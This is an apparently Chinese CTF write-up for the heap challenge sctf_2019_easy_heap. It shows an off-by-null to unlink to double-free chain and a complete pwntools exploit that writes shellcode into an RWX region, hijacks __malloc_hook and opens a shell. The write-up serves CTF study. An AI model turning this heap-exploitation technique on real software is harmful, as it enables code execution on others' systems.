sctf_2019_easy_heap(off by null,unlink造成doublefree)

sctf_2019_easy_heap:

保护全开sctf_2019_easy_heap(off by null,unlink造成doublefree)_第1张图片

程序分析:

给我们mmap了一段可读可写可执行的区域,还告诉了我们地址
sctf_2019_easy_heap(off by null,unlink造成doublefree)_第2张图片
add里告诉了我们堆地址sctf_2019_easy_heap(off by null,unlink造成doublefree)_第3张图片
其他都挺常规的,delete也释放干净了

漏洞分析:

有个off by null
sctf_2019_easy_heap(off by null,unlink造成doublefree)_第4张图片

利用思路:

1.利用漏洞off-by-null造成unlink合并,再申请回来,指针数组里就有两个指针指向同一块地方,我们delete两次就造成了doublefree
2.我们用doublefree往mmap的地方写shellcode
3.再用off-by-null造成unlink合并,再申请回来,使unsortbin里的malloc_hook+96的地址挂在已经free状态的fd里,我们改成malloc_hook,然后申请到malloc_hook里填入mmap的地址
4.最后add触发

exp:

from pwn import *
#from LibcSearcher import * 
local_file  = './sctf_2019_easy_heap'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 0
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',26143 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
#---------------------------
def add(size):
    sla('>> ','1')
    sla('Size: ',str(size))
    ru('Pointer Address 0x')
    return int(rc(12),16)
def delete(index):
    sla('>> ','2')
    sla('Index: ',str(index))
def edit(index,content):
    sla('>> ','3')
    sla('Index: ',str(index))
    sa('Content: ',content)
#---------------------------------
ru('Mmap: 0x')
mmap=int(rc(10),16)
print hex(mmap)
add(0x410)#0
add(0x58)#1
add(0x500-0x10)#2
add(0x58)#3
delete(0)
edit(1,'a'*0x50+p64(0x60+0x420))
delete(2)
add(0x410)#0
add(0x58)#1
delete(3)#not bin_index to -1
delete(1)
delete(2)
add(0x58)
edit(1,p64(mmap)+'\n')
add(0x58)
add(0x58)
shellcode = asm(shellcraft.sh())
edit(3,shellcode+'\n')
#-------------------------
add(0x4f0)
delete(0)
edit(1,'a'*0x50+p64(0x60+0x420))
delete(1)
delete(4)
add(0x410)
edit(2,p8(0x30)+'\n')
add(0x58)
add(0x58)
edit(4,p64(mmap)+'\n')
sla('>> ','1')
sla('Size: ',str(0x1))
r.interactive()

你可能感兴趣的:(PWN,pwn)